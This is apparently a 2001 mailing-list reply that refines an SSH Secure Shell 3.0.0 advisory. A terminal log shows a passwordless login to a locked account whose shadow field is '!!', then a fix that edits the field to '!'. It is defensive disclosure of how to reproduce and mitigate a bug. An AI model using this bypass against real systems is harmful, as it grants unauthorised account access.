Re: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0

["Jen B." <jen () sedition org>]

<from SSH's advisory>
> in SSH Secure Shell 3.0.0, for Unix only, concerning
> accounts with password fields consisting of two or
> fewer characters.

I've tested this on a few machines that I recently upgraded
and have a nit to pick the "or fewer" portion of this statement. 
It's quite late here and I feel I am stating the elementary, 
further comments and corrections would be very helpful.

On RH 6.2 some of the password fields are
nulled in /etc/shadow with "*" and some with "!!"

The only accounts vulnerable to this bug were the ones using "!!"
or any other two-character combinations that I tried. I replaced
the offending accounts with a single character and was unable to login
with the "ease" that I had before. I tested on  Debian 2.2 and
RedHat 6.2.  It is worth noting that Debian does NOT null logins in
/etc/shadow using two characters by default like Red Hat.

btw, I also tested on FreeBSD-4.2 and was unable to login
without providing the proper password regardless of the number of
characters I had in the password field. 


-Jen
jen () sedition org

debian:~# telnet localhost 22
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

Connection closed by foreign host.
debian:~# uname -a
Linux debian 2.4.6-pre3 #4 SMP Tue Jun 26 12:34:37 EST 2001 ppc unknown
debian:~# cat /etc/shadow | grep irc
irc:!!:11498:0:99999:7:::
debian:~# ssh -l irc localhost
irc's password:
Authentication successful.
Last login: Sat Jul 21 2001 01:44:01 -0500
No mail.
irc@debian:~$
debian:~# vi /etc/shadow
...
debian:~# cat /etc/shadow | grep irc
irc:!:11498:0:99999:7:::
debian:~# ssh -l irc localhost
irc's password:
irc's password:
irc's password:
warning: Authentication failed.
Disconnected; no more authentication methods available (No further
authentication methods available.).